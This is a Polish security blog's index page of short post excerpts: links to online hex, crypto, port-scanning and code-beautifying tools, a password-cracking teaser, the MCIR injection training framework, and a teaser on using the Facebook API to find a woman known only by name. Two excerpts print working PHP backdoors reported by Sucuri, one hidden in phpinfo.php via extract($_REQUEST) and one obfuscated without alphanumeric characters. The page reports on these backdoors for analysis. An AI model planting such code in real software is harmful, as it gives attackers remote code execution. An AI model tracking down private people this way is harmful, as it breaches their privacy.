Ciekawy backdoor PHP (funkcja extract)

Poraz kolejny dzięki analizie Securi teamu dowiadujemy się o ciekawym backdorze napisanym w PHP [1]. W tym przypadku backdoor został ukryty w pliku phpinfo.php:

@extract ($_REQUEST);

@die ($ctime($atime));

Czytaj dalej

Otagowane , , ,

Nie znasz dnia ani godziny! Kolejne przydatne narzędzie online, które może okazać się pomocne w nagłych sytuacjach: http://www.onlinehexeditor.com/

 

Hexedytor online

Otagowane , ,

Tym razem wrzucam link z zakresu kryptografii, który mi często ginie i muszę go odszukiwać na nowo co okazuje się niełatwym zadaniem. Ku pokoleniom: http://crypo.in.ua/tools/

Przydatny zestaw narzędzi do (de)szyfrowania/(de)kodowania/haszowania itp.

 

CRYPO – link

Otagowane , ,

„Łamałem hasła, nie ludzi…”

Delikatna parodia tytułu ksiązki KM ma zwiastować tym razem wpis poświęcony łamaniu/zgadywaniu haseł.

Podczas testów penetracyjnych nierzadko stajemy przed koniecznością zbadania siły wykorzystywanych w firmie haseł dostępu do rożnego typu usług, paneli aplikacji webowych, etc.

Jak można podejść do problemu, aby nie wykorzystywać terabajtowych słowników ze słowami, na które prawdopodobnie nikt w firmie by nie wpadł?

Czytaj dalej

Otagowane , , , , , ,

Nie zawsze jest tak, że możemy wykorzystać maszynę, na której pracujemy do np. przeskanowania portów. Z pomocą przychodzi nam wówczas strona https://pentest-tools.com, na której znajdziemy kilka podstawowych narzędzi takich jak whois, skaner portów, url fuzzer itp.

smacznego!

Przydatne narzędzia online

Otagowane , , ,

Gdyby ktoś miał kiedyś problem ze zrozumieniem złożonej komendy shellowej z pomocą może przyjść stronka http://explainshell.com

Explain shell

Otagowane , ,

Backdoor napisany w PHP bez użycia znaków alfanumerycznych (edit: 02.11.2015)

Chłopaki z Securi zamieścili ostatnio ciekawy wpis [1] zawierający informację o backdoorze napisanym w PHP pozwalającym na wywołanie dowolnej funkcji wraz z dowolnymi parametrami za sprawą wartości przekazanych GET’em. Niby nic ciekawego, a jednak. Ów backdoor został zapisany bez użycia jakichkolwiek znaków alfanumerycznych.

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Żeby lepiej się czytało dodajmy kilka ‚enterów’. Czytaj dalej

Otagowane , , , ,

MCIR, czyli The Magical Code Injection Rainbow jest ciekawym frameworkiem treningowym, pozwalającym na budowanie testowych „aplikacji” podatnych na różnego typu wstrzyknięcia.

W jego skład wchodzą:

  • SQLol        – SQL Injection
  • XMLmao  – XML Injection
  • ShelLOL   – Shell Command Injection
  • XSSmh     – XSS

Link do projektu: https://github.com/SpiderLabs/MCIR

PS: Polecam generalnie zajrzeć do katalogu SpiderWebs (https://github.com/SpiderLabs). Można tam znaleźć dużo innych ciekawych projektów , czy repozytoria (m.in. dodatkowe skrypty do Nmapa).

MCIR

Otagowane , , , , ,

FB API + Python

Ostatnio kumpel był na imprezie, na której poznał fajną dziewczynę… i żyli długo i szczęśliwie ^^. Tak naprawdę znał tylko jej imię i na drugi dzień głowił się jak ją namierzyć. Prościej było wziąć po prostu jej nr, no ale jak to mawiają starożytni kukurgistańczycy: mądry Polak po obiedzie.

W pierwszej kolejności ofc event na facebooku i przeglądanie zaproszonych ludzi, a że spora impreza mógł tak spędzić 2 dni. Stwierdziłem, że sprawdzę jak można by go wspomóc w potrzebie.

Czytaj dalej

Otagowane ,

Jeśli potrzebujecie analizować kod JS lub HTML, który został skompresowany/zamieszany/zaciemniony, czyli w skrócie jest średnio czytelny polecam:

http://jsbeautifier.org/

Na szybko możemy w ten sposób doprowadzić ten kod do wstępnego porządku.

JSBeautifier

Otagowane , , ,